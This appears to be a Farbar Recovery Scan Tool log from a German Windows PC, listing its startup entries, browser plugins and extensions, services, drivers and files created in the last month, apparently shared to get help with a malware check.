HKLM-x32\...\Run: [BackupManagerTray] - C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [261888 2009-08-12] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [Hotkey Utility] - C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe [609312 2010-05-06] ()
HKLM-x32\...\Run: [EgisTecLiveUpdate] - C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe [199464 2009-08-04] (Egis Technology Inc.)
HKLM-x32\...\Run: [ArcadeDeluxeAgent] - C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe [128296 2009-11-16] (CyberLink Corp.)
HKLM-x32\...\Run: [PlayMovie] - C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe [181480 2009-11-12] (Acer Corp.)
HKLM-x32\...\Run: [TrayServer] - C:\Program Files (x86)\MAGIX\Video_deluxe_15\Trayserver.exe [90112 2008-08-07] (MAGIX AG)
HKLM-x32\...\Run: [Adobe Version Cue CS2] - C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe [856064 2005-04-06] (Adobe Sytems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 7.0] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe [483328 2008-04-23] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] - [x]
HKLM-x32\...\Run: [BrMfcWnd] - C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] - C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] - C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [2622232 2007-08-31] (Acronis)
HKLM-x32\...\Run: [AcronisTimounterMonitor] - C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe [907040 2007-08-31] (Acronis)
HKLM-x32\...\Run: [Google Desktop Search] - C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
HKLM-x32\...\Run: [LifeCam] - C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe [119152 2010-05-20] (Microsoft Corporation)
HKLM-x32\...\Run: [DivXUpdate] - C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-29] ()
HKLM-x32\...\Run: [Adobe ARM] - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-11-28] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] - C:\Program Files (x86)\iTunes\iTunesHelper.exe [152544 2012-12-12] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] - C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKCU\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKCU\...\Run: [updateMgr] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AdobeUpdateManager.exe [313472 2006-03-30] (Adobe Systems Incorporated)
HKCU\...\Run: [KiesTrayAgent] - C:\Program Files (x86)\Samsung\Kies\/\KiesTrayAgent.exe [3365176 2010-05-14] (Samsung Electronics Co., Ltd.)
MountPoints2: {a6801d55-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
MountPoints2: {a6801d61-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
HKU\Admin\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKU\Default\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\Default User\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\UpdatusUser\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
AppInit_DLLs-x32: C:\PROGRA~2\Google\GOOGLE~3\GO36F4~1.DLL [123392 2010-12-20] (Google)
Lsa: [Authentication Packages] msv1_0 relog_ap
Startup: C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deAT409AT409
BHO: Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
BHO: BrowserHelper Class - {9A065C65-4EE7-4DDD-9918-F129089A894A} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
BHO-x32: No Name - {5C255C8A-E604-49b4-9D64-90988571CECB} -  No File
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
Toolbar: HKLM - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKCU - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{A8B01E69-7297-4C38-B3E3-40775DDD3E9E}: [NameServer]213.94.78.17 213.94.78.16

FireFox:
========
FF ProfilePath: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default
FF Homepage: hxxp://www.starobserver.org|hxxp://news.astronomie.info/
FF Keyword.URL: hxxp://search.skipity.com/?source=ab&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @Google.com/GoogleEarthPlugin - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @t-immersion.com/DFusionHomeWebPlugIn - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.1 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\s-amazon.xml
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\skipity-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\googledesktop.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\yahoo-de.xml
FF Extension: German Dictionary - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\de-DE@dictionaries.addons.mozilla.org [2012-10-14]
FF Extension: Print pages to PDF - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\printPages2Pdf@reinhold.ripper [2013-11-12]
FF Extension: WOT - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{a0d7ccb3-214d-498b-b4aa-0e8fda9a7bf7} [2013-11-28]
FF Extension: Firebug - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\firebug@software.joehewitt.com.xpi [2013-09-23]
FF Extension: Write Area - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\writearea@writearea.com.xpi [2012-10-22]
FF Extension: Web Developer - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{c45c406e-ab73-11d8-be73-000a95be3b12}.xpi [2012-08-15]
FF Extension: Adblock Plus - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-10-19]
FF Extension: Anti-Banner - C:\Program Files (x86)\Mozilla Firefox\extensions\KavAntiBanner@kaspersky.ru_bak [2013-12-12]
FF Extension: Modul zur Link-Untersuchung - C:\Program Files (x86)\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak [2013-12-12]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2013-12-12]
FF HKLM-x32\...\Firefox\Extensions: [virtualKeyboard@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\virtualKeyboard@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [KavAntiBanner@Kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\KavAntiBanner@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [linkfilter@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\linkfilter@kaspersky.ru

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (2007 Microsoft Office system) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (Java(TM) Platform SE 7 U17) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll No File
CHR Plugin: (Microsoft Office Live Plug-in for Firefox) - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
CHR Plugin: (NVIDIA 3D Vision) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
CHR Plugin: (NVIDIA 3D VISION) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
CHR Plugin: (D'Fusion @Home Web Plug-In (3.20.20164)) - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live\u00AE Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_169.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.170.2) - C:\Windows\SysWOW64\npDeployJava1.dll No File
CHR Extension: (Google Docs) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0 [2013-10-11]
CHR Extension: (Google Drive) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0 [2013-10-11]
CHR Extension: (YouTube) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0 [2013-10-11]
CHR Extension: (Google Search) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0 [2013-10-11]
CHR Extension: (Chrome In-App Payments service) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_0 [2013-10-11]
CHR Extension: (Gmail) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0 [2013-04-19]

==================== Services (Whitelisted) =================

S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2010-12-18] (Adobe Systems)
R2 Adobe Version Cue CS2; C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe [163840 2005-04-06] (Adobe Systems Incorporated)
R2 arXfrSvc; C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe [231280 2011-01-10] (Microsoft Corporation)
R2 avmike; C:\Program Files\FRITZ!Fernzugang\avmike.exe [335224 2010-03-30] (AVM Berlin)
R2 certsrv; C:\Program Files\FRITZ!Fernzugang\certsrv.exe [143224 2010-03-30] (AVM Berlin)
R2 dgdersvc; C:\Windows\SysWOW64\dgdersvc.exe [95568 2010-05-13] (Devguru Co., Ltd.)
R2 esClient; C:\Program Files\Windows Home Server\esClient.exe [109936 2011-01-10] (Microsoft Corporation)
R2 FirebirdGuardianHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe [1265664 2011-01-17] ()
R3 FirebirdServerHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe [3735552 2011-01-17] (Firebird Project)
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\MAGIX\Common\Database\bin\fbserver.exe [1527900 2005-11-17] (MAGIX®)
S3 GoogleDesktopManager-051210-111108; C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
R2 HauppaugeTVServer; C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [577024 2012-03-24] (Hauppauge Computer Works)
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [346976 2011-03-14] ()
S3 KiesAllShare; C:\Program Files (x86)\Samsung\Kies\WiselinkPro\WiselinkPro.exe [9241088 2010-05-13] ()
S3 Macromedia Licensing Service; C:\Program Files (x86)\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe [68096 2010-12-19] ()
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [418376 2013-04-04] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [701512 2013-04-04] (Malwarebytes Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-10-23] (Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (Egis Technology Inc.)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [348376 2013-10-23] (Microsoft Corporation)
R2 nwtsrv; C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe [189304 2010-03-30] (AVM Berlin)
R2 TryAndDecideService; C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe [498872 2007-08-31] ()
R2 USBS3S4Detection; C:\OEM\USBDECTION\USBS3S4Detection.exe [76320 2009-12-09] ()
R2 WHSConnector; C:\Program Files\Windows Home Server\WHSConnector.exe [489840 2011-01-10] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 dgderdrv; C:\Windows\System32\drivers\dgderdrv.sys [20568 2010-05-13] (Devguru Co., Ltd)
R3 dgderdrv; C:\Windows\SysWOW64\drivers\dgderdrv.sys [18136 2010-05-13] (Devguru Co., Ltd)
S3 hcw17bda; C:\Windows\System32\drivers\hcw17bda.sys [67456 2010-01-27] (Hauppauge Computer Works, Inc.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [242688 2012-12-22] (Huawei Technologies Co., Ltd.)
S4 Iaaidassi; No ImagePath
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25928 2013-04-04] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [248240 2013-09-27] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [134944 2013-09-27] (Microsoft Corporation)
R3 NWIM; C:\Windows\System32\DRIVERS\avmnwim.sys [412024 2010-03-30] (AVM Berlin)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-08-06] ()
R1 UimBus; C:\Windows\System32\DRIVERS\uimx64.sys [59184 2011-11-17] (Windows (R) 2000 DDK provider)
R1 Uim_IM; C:\Windows\System32\Drivers\Uim_IMx64.sys [572336 2011-11-17] (Paragon)
R1 Uim_VIM; C:\Windows\System32\Drivers\uim_vimx64.sys [352816 2011-11-17] (Paragon)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2010-07-27] (Huawei Technologies Co., Ltd.)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-01-16 15:50 - 2014-01-16 15:50 - 00001166 _____ C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-01-16 15:48 - 2014-01-16 15:49 - 06072408 _____ (TeamViewer GmbH) C:\Users\*****\Downloads\TeamViewer_Setup_de.exe
2014-01-16 15:08 - 2014-01-16 20:14 - 00000000 ____D C:\Users\*****\AppData\Local\VMware
2014-01-16 15:08 - 2014-01-16 20:08 - 00000000 ____D C:\Users\*****\AppData\Roaming\VMware
2014-01-16 15:08 - 2013-10-08 18:21 - 00073296 _____ (VMware, Inc.) C:\Windows\system32\Drivers\vsock.sys
2014-01-16 15:08 - 2013-10-08 18:21 - 00067664 _____ (VMware, Inc.) C:\Windows\system32\vsocklib.dll
2014-01-16 15:08 - 2013-10-08 18:21 - 00063568 _____ (VMware, Inc.) C:\Windows\SysWOW64\vsocklib.dll
2014-01-16 15:07 - 2013-10-18 12:46 - 00064080 _____ (VMware, Inc.) C:\Windows\system32\Drivers\vmx86.sys
2014-01-16 15:07 - 2013-10-18 12:45 - 00930384 _____ (VMware, Inc.) C:\Windows\system32\vnetlib64.dll
2014-01-16 15:07 - 2013-10-18 12:45 - 00437328 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
2014-01-16 15:07 - 2013-10-18 12:45 - 00358480 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
2014-01-16 15:07 - 2013-10-18 12:45 - 00030800 _____ (VMware, Inc.) C:\Windows\system32\Drivers\vmnetuserif.sys
2014-01-16 15:07 - 2013-10-18 12:44 - 00032848 _____ (VMware, Inc.) C:\Windows\system32\Drivers\VMkbd.sys
2014-01-16 15:07 - 2013-10-09 08:04 - 00053816 _____ (VMware, Inc.) C:\Windows\system32\Drivers\hcmon.sys
2014-01-16 15:06 - 2014-01-16 19:42 - 00000000 ____D C:\ProgramData\VMware
2014-01-16 15:06 - 2014-01-16 15:06 - 00002124 _____ C:\Users\Public\Desktop\VMware Player.lnk
2014-01-16 15:06 - 2014-01-16 15:06 - 00000000 ____D C:\Program Files\Common Files\VMware
2014-01-16 15:06 - 2014-01-16 15:06 - 00000000 ____D C:\Program Files (x86)\VMware
2014-01-16 10:51 - 2014-01-16 10:51 - 00000000 ____D C:\Program Files (x86)\ESET
2014-01-16 08:22 - 2014-01-16 08:22 - 00000404 _____ C:\Users\*****\Desktop\LAN-Verbindung - Verknüpfung.lnk
